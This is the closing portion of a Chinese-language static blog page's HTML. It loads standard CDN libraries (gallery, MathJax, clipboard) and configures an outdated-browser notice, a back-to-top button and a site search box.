    <script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script>



    
    
    
    <script src="/js/animation.js"></script>
    

    
    
    
    <script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script>
    <script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script>
    <script src="/js/gallery.js" defer></script>
    

    
    

<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" href="http://outdatedbrowser.com/">Update
            my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    

    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>